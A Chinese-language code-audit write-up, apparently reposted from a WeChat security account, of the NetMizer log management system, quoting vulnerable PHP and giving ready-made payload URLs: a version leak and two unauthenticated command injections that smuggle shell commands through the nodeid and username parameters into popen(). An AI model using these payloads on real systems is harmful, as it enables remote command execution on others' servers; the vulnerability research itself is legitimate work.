0x00 前言
title=”NetMizer 日志管理系统”
0x01 前台信息泄露
/data/config/upload.php 泄露了版本号.
include('../include/JSON.php');$conn_id = mysql_connect($dsn,$dbuser,$dbpasswd);mysql_select_db("sysmonitor");$versionfile = '/var/www/html/logserver/web.ver';$flagfile = '/tmp/upgradeflag';function checkpw($username, $password) {$sqlstr = "SELECT password FROM tbl_admin WHERE username='".$username."'";$res = mysql_query($sqlstr);if($res){if(mysql_fetch_row($res)){$pwd = mysql_result($res,0,"password");if($password!="") $password = crypt($password,"poseidon");if($pwd == $password){mysql_close($conn_id);return 0;}}}return -1;}if($action == 'upload'){$passwd = mb_check_encoding($passwd, 'UTF-8') ? mb_convert_encoding($passwd, 'gbk', 'UTF-8') : $passwd;if(checkpw('admin',$passwd)<0) {echo '{"success":true, "info":"password error"}';return;}$file = $_FILES["userfile"]["tmp_name"];$file_name = $_FILES["userfile"]["name"];$tmp_filename = "/tmp/".$file_name;$result = move_uploaded_file($file, $tmp_filename);if($result){echo "{'success':true,'info':''}";} else {$errstr = "�����ļ��ϴ�ʧ�ܣ��������ϴ���";echo "{'success':true,'info':'$errstr'}";return;}chdir("/");$fp = @fopen('/tmp/webupdate.tmp', "w");@fwrite($fp, $file_name);@fclose($fp);system("mv /tmp/webupdate.tmp $flagfile");return;} else if($action == 'getversion'){$lines=@file($versionfile);$version = "20090101";if(isset($lines) && isset($lines[0]) && $lines[0]!="") $version = trim($lines[0]);$str = array("success"=>true, "datas"=>$version);$json = json_encode($str);echo $json;return;}
Payload:/data/config/upload.php?action=getversion
0x02 前台任意命令执行
/data/search/position.php
<?phpinclude('../include/JSON.php');$cmd = "/var/www/cgi-bin/search_qq";if(!$starttime){$stop_time = floor(time()/300)*300;$stop_time = 1471338000+3600;$start_time = $stoptime - 600;} else {list($year,$month,$day,$hour,$min,$second)=split(":| |-", urldecode($starttime));$start_time = mktime($hour, $min, $second, $month,$day,$year);$cmd .= " -s $start_time";list($year,$month,$day,$hour,$min,$second)=split(":| |-", urldecode($stoptime));$stop_time = mktime($hour, $min, $second, $month,$day,$year);$cmd .= " -e $stop_time";}if($nodeid != ""){$sql_nodeid = " and nodeid = ".ip2long($nodeid)." ";$cmd .= " -n $nodeid";} else $sql_nodeid = "";$srcip = $src;if($srcip == ""){$srcid = "-1";} else $srcid = ip2long($srcip);if($srcid != "-1"){$sql_srcid = " and srcip = $srcid ";$cmd .= " -S $srcid";} else {$sql_srcid = "";}if($action == 'file'){//echo $cmd."n";$fp = @popen($cmd,"r");if(!$fp){echo '{"success":true,"info":"no data"}';return;}
当 action=file时 nodeid若不为空 会插入到$cmd变量里 并传入到下方的@popen($cmd,”r”);造成命令执行.
Payload:/data/search/position.php?action=file&nodeid=|id>1.txt
0x03 前台任意命令执行2
if($action == 'list'){ // do by cif(!$nodeid){$devices = array();$cmd = "ls $logpath";exec($cmd,$devices);for($i = 0; $i < count($devices); $i ++){if(!ip2long($devices[$i])) continue;;if(!$nodeid){$nodeid = $devices[$i];break;}}}$stop = $start + $limit;//cgi -i 3232235877-3232235877 -a 1444974920 -s 0 -e 400$cmd = "$cgi -q 1 -s $start -e $stop -n $nodeid ";$cmd .= "-a $start_time -b $stop_time ";if(isset($iplist) && $iplist != ""){$iplists = explode("-", $iplist);$ipstart = ip2long($iplists[0]);if(isset($iplists[1])) $ipstop = ip2long($iplists[1]);else $ipstop = $ipstart;$cmd .= "-i $ipstart-$ipstop ";}if(isset($username) && $username != "") $cmd .= "-u $username ";if(isset($sorttype)) $cmd .= "-c $sorttype ";//echo "$cmdn";$fp=@popen($cmd, "r");
Payload:/data/hostdelay/hostdelay.php?action=list&username=|ps>1.txt
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):某日志管理系统审计
